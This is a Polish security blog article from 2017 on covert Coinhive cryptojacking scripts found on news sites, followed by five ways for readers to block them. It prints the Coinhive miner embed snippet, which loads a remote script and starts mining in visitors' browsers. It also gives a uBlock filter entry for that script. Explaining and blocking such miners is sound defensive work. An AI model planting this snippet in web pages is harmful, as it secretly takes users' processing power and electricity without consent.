Jak się zabezpieczyć przed JavaScript’owymi koparkami kryptowalut?

29 września, 2017

Od kilku dni nie opadają emocje po odkryciu złośliwych skryptów JavaScript na stronach internetowych do kopania kryptowaluty Monero. Ktoś najwyraźniej się nie bał i postanowił wykorzystać siły przerobowe komputerów użytkowników do wzbogacenia się, przy okazji chyba zapomniał poinformować drugiej strony o swoich zamiarach. W efekcie poszkodowani obserwują nieznacznie wyższe rachunki za prąd, a sprawcy liczą przychody z dodatkowego źródła.

Efekt domina

Do skutecznego wydobywania kryptowaluty jeden komputer do zdecydowanie za mało. Firmy takie jak Coinhive oraz JSECoin za kilkadziesiąt procent udziałów w zyskach oferują przeglądarkowe skrypty, które uruchamiane na urządzeniach zaczynają korzystać z mocy procesora — oczywiście bez wiedzy użytkowników. Teoretycznie każdy właściciel strony internetowej, czy botnetu może wykorzystać jego popularność do wzbogacenia się. Wystarczy założyć konto na stronie sprzedawcy, który oferuje API w JavaScript i wkleić w źródło strony kod:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
       var miner = new CoinHive.User('<site-key>', 'john-doe');
       miner.start();
</script>

Jeśli na stronie internetowej będzie przesiadywało non-stop 10 osób, to identyfikowany przez unikalny klucz i nazwę użytkownika właściciel skryptu, może liczyć na zarobek rzędu ~27 dolarów miesięcznie. Prowizja wynosi 30%.

Skala problemu

Większość stron internetowych zawiera podobne złośliwy skrypty raczej przypadkowo. Najczęściej jest to spowodowane podmianą plików po wykorzystaniu przez atakujących luki w konfiguracji serwera lub web-aplikacji. Możemy jednak przyjąć, że witryny internetowe takie jak gazeta.pl, katowice.naszemiasto.pl, warszawa.naszemiasto.pl, nowiny24.pl, rp.pl i wiele, wiele innych mają wspólny mianownik — dostawców rotacyjnych reklam, którzy niezbyt często weryfikują to, co trafia do ich systemów wyświetlających reklamy na stronach partnerów.

DKp S1nXoAMSQsg
Wtyczka Safe Browser dla Chrome także zawierała skrypt do kopania.
DKpeL55XoAAWm3D
Skrypt CoinHive na jednym z węzłów wejściowych do sieci Tor.

Jak się chronić?

Podajemy 5 sposobów zabezpieczenia się przez skryptami JavaScript kopiącymi kryptowalutę. Dublowanie warstw zabezpieczających nie jest konieczne, aczkolwiek zastosowanie kilku z nich na pewno nie zaszkodzi.

  1. W publicznym repozytorium GitHuba zamieszczono wtyczkę „No Coin” dla przeglądarek Firefox, ChromeOpera. Rozszerzenie zostało już dodane do oficjalnych repozytoriów każdego producenta. Zalecamy jego instalację, ponieważ rozszerzenie zabezpiecza nie tylko przez opisywanym skryptem do kopania Monero, ale także przed koparkami innych kryptowalut.
  2. Podobny efekt daje zainstalowanie blokera reklam „uBlock Origin”. W konfiguracji „moje filtry” dodajemy coin-hive.com/lib/coinhive.min.js poprzedzając wpis protokołem https://. Oprócz blokowania reklam, hostów ze spamem, hostów ze złośliwymi reklamami, hostów szpiegujących i hostów z malware, zyskujemy możliwość blokowania custom’owych adresów URL.
  3. Instalujemy bardzo skuteczną wtyczkę Bitdefender Trafichlight do skanowania stron WWW. Instalator automatycznie wykryje przeglądarkę (Chrome, Firefox lub Safari) i przeniesie użytkownika do repozytorium z rozszerzeniem. Instalując dodatek firmy Bitdefender otrzmujemy jeden z najskuteczniejszych na świecie skanerów do wykrywania phishingu, malware i stron z oszustwami, a także ochronę już w wynikach wyszukiwania.
  4. Instalujemy dodatek NoScript do przeglądarek.
  5. Większość programów zabezpieczających posiadających moduły do skanowania stron WWW powinno już wykrywać podobne złośliwe skrypty. Chcąc, czy nie chcąc, po raz kolejny jesteśmy bogatsi o doświadczenie, które utwierdza w przekonaniu, że ochrona komputerów powinna być kompleksowa i zaczynać się już od przeglądarki.
Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

Czy ten artykuł był pomocny?

Średnia ocena: 0 / 5. Liczba głosów: 0

guest
2 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]